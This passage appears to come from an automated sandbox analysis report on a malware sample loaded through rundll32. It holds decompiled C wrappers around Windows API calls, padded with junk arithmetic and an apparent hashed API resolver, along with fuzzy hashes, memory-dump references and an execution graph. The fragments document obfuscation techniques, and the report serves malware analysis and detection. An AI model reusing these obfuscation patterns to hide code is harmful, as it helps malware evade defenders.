                                                                                                                    0x001c5deb
                                                                                                                    0x001c5dfa
                                                                                                                    0x001c5dff
                                                                                                                    0x001c5e09
                                                                                                                    0x001c5e15
                                                                                                                    0x001c5e1c
                                                                                                                    0x001c5e23
                                                                                                                    0x001c5e27
                                                                                                                    0x001c5e2b
                                                                                                                    0x001c5e32
                                                                                                                    0x001c5e4a
                                                                                                                    0x001c5e58
                                                                                                                    0x001c5e5f

                                                                                                                    APIs
                                                                                                                    • SetFileInformationByHandle.KERNEL32(65528FD4,00000000,?,00000028), ref: 001C5E58
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileHandleInformation
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3935143524-0
                                                                                                                    • Opcode ID: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                    • Instruction ID: 906d8cfdda33e675e2ee861f7666a07b35c15f671ed7052db51e1d3ff6a1388d
                                                                                                                    • Opcode Fuzzy Hash: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                    • Instruction Fuzzy Hash: 3F018F7694120CBBDB24DED5CC0AEEEBF74EF55714F108089F50466250D7B15B50DBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 001C1E22 Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 280 1c1e22-1c1ea6 call 1d20b9 call 1daa30 RtlAllocateHeap
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E001C1E22(long __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				void* _t34;
				signed int _t36;
				long _t42;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t42 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D20B9(_t27);
				_v12 = 0x309d17;
				_v12 = _v12 | 0x1b560655;
				_v12 = _v12 ^ 0x1b78328a;
				_v8 = 0xa187d;
				_v8 = _v8 + 0xa972;
				_t36 = 0x67;
				_v8 = _v8 / _t36;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x000b519a;
				E001DAA30(0x1c2, 0x9df7cc0d, _t36, 0x8eab3015);
				_t34 = RtlAllocateHeap(_a8, _t42, _a4); // executed
				return _t34;
			}









                                                                                                                    0x001c1e25
                                                                                                                    0x001c1e26
                                                                                                                    0x001c1e28
                                                                                                                    0x001c1e2b
                                                                                                                    0x001c1e2d
                                                                                                                    0x001c1e30
                                                                                                                    0x001c1e33
                                                                                                                    0x001c1e37
                                                                                                                    0x001c1e38
                                                                                                                    0x001c1e3d
                                                                                                                    0x001c1e47
                                                                                                                    0x001c1e50
                                                                                                                    0x001c1e57
                                                                                                                    0x001c1e5e
                                                                                                                    0x001c1e6a
                                                                                                                    0x001c1e72
                                                                                                                    0x001c1e7a
                                                                                                                    0x001c1e7e
                                                                                                                    0x001c1e91
                                                                                                                    0x001c1ea0
                                                                                                                    0x001c1ea6

                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(AF136809,000C892D,1B78328A,?,?,?,001C80DB,?,00000000,AF136809), ref: 001C1EA0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                    • Instruction ID: a7c90d1943c5424bf908a449a8f909264212c96b150336414c4ac1880160e9f9
                                                                                                                    • Opcode Fuzzy Hash: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                    • Instruction Fuzzy Hash: EA014476901208FBEB05DFD4DC0A8DE7BB5EF45354F208089F9086A211E7B29F20AB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 001D46BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 285 1d46bb-1d473b call 1d20b9 call 1daa30 SHGetFolderPathW
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E001D46BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E001D20B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E001DAA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                    0x001d46d5
                                                                                                                    0x001d46da
                                                                                                                    0x001d46e4
                                                                                                                    0x001d46ec
                                                                                                                    0x001d46f3
                                                                                                                    0x001d46f7
                                                                                                                    0x001d46fe
                                                                                                                    0x001d4705
                                                                                                                    0x001d470c
                                                                                                                    0x001d4724
                                                                                                                    0x001d4735
                                                                                                                    0x001d473b

                                                                                                                    APIs
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 001D4735
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderPath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1514166925-0
                                                                                                                    • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                    • Instruction ID: 561b3523fc2865a53db48b2c132ef2413f53b5766f007e29b481afcc78b8c7ce
                                                                                                                    • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                    • Instruction Fuzzy Hash: 90012C75801228BBCF15AFD5DC098DFBFB8EF45394F108145F91826211D3758A60DBD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 001C93ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 73%
                                                                                                                    			E001C93ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E001DAA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                    0x001c93f3
                                                                                                                    0x001c9405
                                                                                                                    0x001c9411
                                                                                                                    0x001c9412
                                                                                                                    0x001c9413
                                                                                                                    0x001c941a
                                                                                                                    0x001c9421
                                                                                                                    0x001c9428
                                                                                                                    0x001c9433
                                                                                                                    0x001c9436
                                                                                                                    0x001c943d
                                                                                                                    0x001c9444
                                                                                                                    0x001c9451
                                                                                                                    0x001c945b

                                                                                                                    APIs
                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 001C945B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 621844428-0
                                                                                                                    • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                    • Instruction ID: 5b4dbfde60cfaf4d518504bc2e5eca56c9af72ce4d91db2b238e4d335286621a
                                                                                                                    • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                    • Instruction Fuzzy Hash: 92F03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9D604B3261E7B05F459A91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 001D8F9E Relevance: 1.5, APIs: 1, Instructions: 31serviceCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 55%
                                                                                                                    			E001D8F9E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				unsigned int _v12;
				void* _t19;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D20B9(_t19);
				_v12 = 0xd87912;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0006adfb;
				_v8 = 0xf5ad8e;
				_v8 = _v8 + 0xc481;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x00032ff7;
				E001DAA30(0x26e, 0x20a9b263, __ecx, 0x37d4b579);
				_t24 = CloseServiceHandle(_a12); // executed
				return _t24;
			}







                                                                                                                    0x001d8fa1
                                                                                                                    0x001d8fa2
                                                                                                                    0x001d8fa3
                                                                                                                    0x001d8fa6
                                                                                                                    0x001d8fa9
                                                                                                                    0x001d8fad
                                                                                                                    0x001d8fae
                                                                                                                    0x001d8fb3
                                                                                                                    0x001d8fbd
                                                                                                                    0x001d8fc6
                                                                                                                    0x001d8fcd
                                                                                                                    0x001d8fd4
                                                                                                                    0x001d8fdb
                                                                                                                    0x001d8fdf
                                                                                                                    0x001d8ff7
                                                                                                                    0x001d9002
                                                                                                                    0x001d9007

                                                                                                                    APIs
                                                                                                                    • CloseServiceHandle.ADVAPI32(33E0711C), ref: 001D9002
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleService
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1725840886-0
                                                                                                                    • Opcode ID: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                    • Instruction ID: 6d76eb703b8896e975a64c93da87ddeb80f5a70e36894a4b01e662692c1ea686
                                                                                                                    • Opcode Fuzzy Hash: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                    • Instruction Fuzzy Hash: F3F0F9B591520CFFDF05EFD4C94A89EBBB4EB24308F208198F80562611D7B69B64EF51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 001D1F8A Relevance: 1.5, APIs: 1, Instructions: 31fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 68%
                                                                                                                    			E001D1F8A(intOrPtr __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t19;
				int _t25;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001D20B9(_t19);
				_v12 = 0x96b134;
				_v12 = _v12 + 0xdeb4;
				_v12 = _v12 | 0x0c5d8169;
				_v12 = _v12 ^ 0x0cdc4dba;
				_v8 = 0xf8ae2a;
				_v8 = _v8 + 0xcab3;
				_v8 = _v8 * 0x2b;
				_v8 = _v8 ^ 0x29e0cf29;
				E001DAA30(0x112, 0x9df7cc0d, __ecx, 0x6fe24f6c);
				_t25 = DeleteFileW(_a4); // executed
				return _t25;
			}







                                                                                                                    0x001d1f8d
                                                                                                                    0x001d1f8e
                                                                                                                    0x001d1f8f
                                                                                                                    0x001d1f93
                                                                                                                    0x001d1f94
                                                                                                                    0x001d1f99
                                                                                                                    0x001d1fa3
                                                                                                                    0x001d1faf
                                                                                                                    0x001d1fb6
                                                                                                                    0x001d1fbd
                                                                                                                    0x001d1fc4
                                                                                                                    0x001d1fda
                                                                                                                    0x001d1fdd
                                                                                                                    0x001d1fea
                                                                                                                    0x001d1ff5
                                                                                                                    0x001d1ffa

                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNEL32(0CDC4DBA,?,?,?,?), ref: 001D1FF5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4033686569-0
                                                                                                                    • Opcode ID: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                    • Instruction ID: 5759bbd17aceee5f28a676ddff07c8de3ce8a2e55a89f5369183327290a9c410
                                                                                                                    • Opcode Fuzzy Hash: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                    • Instruction Fuzzy Hash: 4FF0F9B190120CFBDF18EFD4D9468AEBFB5EB50304F20829AF40467222E7715F549B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 001D5BFD Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E001D5BFD(intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t20;
				struct HINSTANCE__* _t25;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D20B9(_t20);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x5faaf9;
				_v20 = 0xab22cd;
				_v12 = 0x8e3542;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x00089943;
				_v8 = 0x9b967a;
				_v8 = _v8 ^ 0x4689732a;
				_v8 = _v8 ^ 0x4619bdd7;
				E001DAA30(0x12d, 0x9df7cc0d, __ecx, 0xf5e9dd1e);
				_t25 = LoadLibraryW(_a8); // executed
				return _t25;
			}










                                                                                                                    0x001d5c03
                                                                                                                    0x001d5c06
                                                                                                                    0x001d5c0a
                                                                                                                    0x001d5c0b
                                                                                                                    0x001d5c10
                                                                                                                    0x001d5c17
                                                                                                                    0x001d5c23
                                                                                                                    0x001d5c2a
                                                                                                                    0x001d5c31
                                                                                                                    0x001d5c35
                                                                                                                    0x001d5c3c
                                                                                                                    0x001d5c43
                                                                                                                    0x001d5c4a
                                                                                                                    0x001d5c62
                                                                                                                    0x001d5c6d
                                                                                                                    0x001d5c72

                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(00000000), ref: 001D5C6D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1029625771-0
                                                                                                                    • Opcode ID: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                    • Instruction ID: 8201e592a2a42ee05521dd926d4e134f6b081d0977a11c127cdf71e219bc2fba
                                                                                                                    • Opcode Fuzzy Hash: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                    • Instruction Fuzzy Hash: 41F0FFB5C0020CFBCF04EFE4DA06AEEBBB4FB50318F508188E91566212D3B54B58DB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 001CB23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E001CB23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D20B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E001DAA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                    0x001cb23f
                                                                                                                    0x001cb240
                                                                                                                    0x001cb241
                                                                                                                    0x001cb244
                                                                                                                    0x001cb247
                                                                                                                    0x001cb24a
                                                                                                                    0x001cb24e
                                                                                                                    0x001cb24f
                                                                                                                    0x001cb254
                                                                                                                    0x001cb25e
                                                                                                                    0x001cb26a
                                                                                                                    0x001cb271
                                                                                                                    0x001cb278
                                                                                                                    0x001cb27f
                                                                                                                    0x001cb286
                                                                                                                    0x001cb28d
                                                                                                                    0x001cb294
                                                                                                                    0x001cb29b
                                                                                                                    0x001cb2b3
                                                                                                                    0x001cb2c1
                                                                                                                    0x001cb2c6

                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNEL32(EE1E6DE5,57E9DC2B), ref: 001CB2C1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1586166983-0
                                                                                                                    • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                    • Instruction ID: 15c71d46371b61a2cd164fd148c8d86095800ac210e70d66d9648c1e064faf3e
                                                                                                                    • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                    • Instruction Fuzzy Hash: FB011A72C04608FFDF45DFD4DD468AEBB75EB54304F108189F90566252E3714B609B51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 001D1E67 Relevance: 1.3, APIs: 1, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 72%
                                                                                                                    			E001D1E67(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t23;
				int _t29;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D20B9(_t23);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x62b4e9;
				_v20 = 0xc383c4;
				_v12 = 0x238243;
				_v12 = _v12 * 0x67;
				_v12 = _v12 ^ 0x0e4d658b;
				_v8 = 0x6564d0;
				_v8 = _v8 ^ 0x2b193590;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x8a2acb03;
				E001DAA30(0x23f, 0x9df7cc0d, __ecx, 0x3185251c);
				_t29 = CloseHandle(_a12); // executed
				return _t29;
			}










                                                                                                                    0x001d1e6d
                                                                                                                    0x001d1e70
                                                                                                                    0x001d1e73
                                                                                                                    0x001d1e77
                                                                                                                    0x001d1e78
                                                                                                                    0x001d1e7d
                                                                                                                    0x001d1e84
                                                                                                                    0x001d1e90
                                                                                                                    0x001d1e97
                                                                                                                    0x001d1ead
                                                                                                                    0x001d1eb0
                                                                                                                    0x001d1eb7
                                                                                                                    0x001d1ebe
                                                                                                                    0x001d1ec5
                                                                                                                    0x001d1ec9
                                                                                                                    0x001d1ed6
                                                                                                                    0x001d1ee1
                                                                                                                    0x001d1ee6

                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNEL32(00C383C4), ref: 001D1EE1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                    • Instruction ID: a528df66d266e05178aa6e84feaa89f2cff58e4358b7922b8a9b1155a79d977d
                                                                                                                    • Opcode Fuzzy Hash: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                    • Instruction Fuzzy Hash: 780124B5C00208FBCF40EFA4E94A9AEBFB5EB14308F508499E81567212D7718B24DF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:16.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:297
                                                                                                                    Total number of Limit Nodes:23
                                                                                                                    execution_graph 31847 10035042 TlsGetValue 31848 10035076 GetModuleHandleA 31847->31848 31849 10035055 31847->31849 31851 10035085 GetProcAddress 31848->31851 31852 1003509f 31848->31852 31849->31848 31850 1003505f TlsGetValue 31849->31850 31855 1003506a 31850->31855 31853 1003506e 31851->31853 31853->31852 31854 10035095 RtlEncodePointer 31853->31854 31854->31852 31855->31848 31855->31853 31856 10020c26 31857 10020c32 __EH_prolog3 31856->31857 31859 10020c80 31857->31859 31867 1002083b EnterCriticalSection 31857->31867 31881 100201f1 RaiseException __CxxThrowException@8 31857->31881 31882 1002094b TlsAlloc InitializeCriticalSection 31857->31882 31883 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31859->31883 31861 10020c8d 31864 10020c93 31861->31864 31865 10020ca6 ~_Task_impl 31861->31865 31884 100209ed 88 API calls 5 library calls 31864->31884 31868 1002085a 31867->31868 31870 10020893 31868->31870 31871 100208a8 GlobalHandle GlobalUnlock 31868->31871 31880 10020916 _memset 31868->31880 31869 1002092a LeaveCriticalSection 31869->31857 31885 10014460 31870->31885 31872 10014460 ctype 80 API calls 31871->31872 31874 100208c5 GlobalReAlloc 31872->31874 31876 100208cf 31874->31876 31877 100208f7 GlobalLock 31876->31877 31878 100208da GlobalHandle GlobalLock 31876->31878 31879 100208e8 LeaveCriticalSection 31876->31879 31877->31880 31878->31879 31879->31877 31880->31869 31882->31857 31883->31861 31884->31865 31886 10014477 ctype 31885->31886 31887 1001448c GlobalAlloc 31886->31887 31889 10013ba0 80 API calls _DebugHeapAllocator 31886->31889 31887->31876 31889->31887 31890 10030d06 31891 10030d12 31890->31891 31892 10030d0d 31890->31892 31896 10030c10 31891->31896 31908 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31892->31908 31895 10030d23 31897 10030c1c ___BuildCatchObjectHelper 31896->31897 31901 10030c69 31897->31901 31907 10030cb9 ___BuildCatchObjectHelper 31897->31907 31909 10030a37 31897->31909 31901->31907 31963 100125c0 31901->31963 31902 10030c99 31903 10030a37 __CRT_INIT@12 165 API calls 31902->31903 31902->31907 31903->31907 31904 100125c0 ___DllMainCRTStartup 146 API calls 31905 10030c90 31904->31905 31906 10030a37 __CRT_INIT@12 165 API calls 31905->31906 31906->31902 31907->31895 31908->31891 31910 10030b61 31909->31910 31911 10030a4a GetProcessHeap HeapAlloc 31909->31911 31913 10030b67 31910->31913 31914 10030b9c 31910->31914 31912 10030a6e GetVersionExA 31911->31912 31928 10030a67 31911->31928 31915 10030a89 GetProcessHeap HeapFree 31912->31915 31916 10030a7e GetProcessHeap HeapFree 31912->31916 31921 10030b86 31913->31921 31913->31928 32011 100310be 67 API calls _doexit 31913->32011 31917 10030ba1 31914->31917 31918 10030bfa 31914->31918 31919 10030ab5 31915->31919 31916->31928 31995 10035135 6 API calls __decode_pointer 31917->31995 31918->31928 32030 10035425 79 API calls 2 library calls 31918->32030 31985 10036624 HeapCreate 31919->31985 31921->31928 32012 100389ee 68 API calls ___wtomb_environ 31921->32012 31923 10030ba6 31996 10035840 31923->31996 31928->31901 31929 10030aeb 31929->31928 31932 10030af4 31929->31932 31930 10030b90 32013 10035178 70 API calls 2 library calls 31930->32013 32002 1003548e 78 API calls 6 library calls 31932->32002 31935 10030bbe 32015 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31935->32015 31937 10030af9 __RTC_Initialize 31942 10030b0c GetCommandLineA 31937->31942 31956 10030afd 31937->31956 31938 10030b95 32014 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31938->32014 31939 10030bd0 31943 10030bd7 31939->31943 31944 10030bee 31939->31944 32004 10038d66 77 API calls 3 library calls 31942->32004 32016 100351b5 67 API calls 4 library calls 31943->32016 32017 1002fa69 